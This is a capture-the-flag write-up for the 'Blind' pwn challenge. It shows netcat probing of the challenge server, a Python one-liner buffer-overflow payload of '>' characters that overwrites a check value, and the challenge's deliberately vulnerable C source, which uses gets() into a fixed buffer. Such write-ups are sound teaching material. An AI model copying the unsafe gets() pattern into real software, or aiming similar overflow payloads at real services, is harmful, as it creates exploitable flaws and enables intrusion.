bx01

Blind

Connecting to nc puzzler7.imaginaryctf.org 1111 we're greeted with the following:

$ nc puzzler7.imaginaryctf.org 1111   
[EXCEPTION] Angle Brackets unterminated.

If we send hi after this message we get the response [MESSAGE] Exception unresolved. Exiting. back.

Let's use python to see if there's a limit to how much data we can send:

$ python3 -c 'print("A" * 2000)' | nc puzzler7.imaginaryctf.org 1111
[EXCEPTION] Angle Brackets unterminated.
[MESSAGE] Exception unresolved. Exiting.
*** stack smashing detected ***: terminated

With a bit of trial and error we find we can send up to 1016 characters without triggering the *** stack smashing detected ***: terminated error.

Putting the hint from the exception about unterminated angle brackets together with this let's send 1016 >s and see what happens:

$ python3 -c 'print(">" * 1016)' | nc puzzler7.imaginaryctf.org 1111
[EXCEPTION] Angle Brackets unterminated.
ictf{sourceless_binaryless_pwn_lul}

We get the flag ictf{sourceless_binaryless_pwn_lul}!

Unintended?

Despite the flag telling us there was no binary or source, when the challenge was published it had a link to download this vuln.c file:

#include <stdio.h>

extern gets;

struct contrived_chall {
  char lolololol[1000];
  long code;
};

void (*lolol)(char*) = &puts;
void (*lololol)(char*) = &gets;

int main() {
  struct contrived_chall lol;
  setvbuf(stdin, NULL, 2, 0);
  setvbuf(stdout, NULL, 2, 0);
  lolol("[EXCEPTION] Angle Brackets unterminated.");
  lololol(lol.lolololol);
  if (lol.code == 0x3e3e3e3e3e3e3e3e) {
    FILE *fp;
    fp = fopen("flag.txt", "r");
    fscanf(fp, "%s", lol.lolololol);
    lolol(lol.lolololol);
  }
  lolol("[MESSAGE] Exception unresolved. Exiting.");
}

With this we can see we need a buffer of any 1000 characters followed by 8 >s.